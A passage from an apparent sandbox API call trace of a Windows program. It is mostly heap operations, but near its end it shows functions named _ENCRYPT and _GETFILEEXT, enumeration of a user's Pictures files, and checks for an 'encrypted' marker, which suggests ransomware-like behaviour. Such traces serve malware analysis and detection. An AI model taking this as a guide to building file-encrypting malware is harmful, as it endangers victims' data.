hHeap=0x770000) returned 1 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.918] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.919] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.920] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.920] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.921] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0039.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.921] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.922] CloseHandle (hObject=0x140) returned 1 [0039.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.922] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.923] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.923] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.923] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.923] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.923] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.923] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f309b90, ftCreationTime.dwHighDateTime=0x1d5bad4, ftLastAccessTime.dwLowDateTime=0x14b56b20, ftLastAccessTime.dwHighDateTime=0x1d5bea6, ftLastWriteTime.dwLowDateTime=0x14b56b20, ftLastWriteTime.dwHighDateTime=0x1d5bea6, nFileSizeHigh=0x0, nFileSizeLow=0x123cb, dwReserved0=0x0, dwReserved1=0x777648, cFileName="QZEtzxM.bmp", cAlternateFileName="")) returned 0x7c20c0 [0039.923] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f309b90, ftCreationTime.dwHighDateTime=0x1d5bad4, ftLastAccessTime.dwLowDateTime=0x14b56b20, ftLastAccessTime.dwHighDateTime=0x1d5bea6, ftLastWriteTime.dwLowDateTime=0x14b56b20, ftLastWriteTime.dwHighDateTime=0x1d5bea6, nFileSizeHigh=0x0, nFileSizeLow=0x123cb, dwReserved0=0x0, dwReserved1=0x777648, cFileName="QZEtzxM.bmp", cAlternateFileName="")) returned 0x7c20c0 [0039.924] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.924] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) 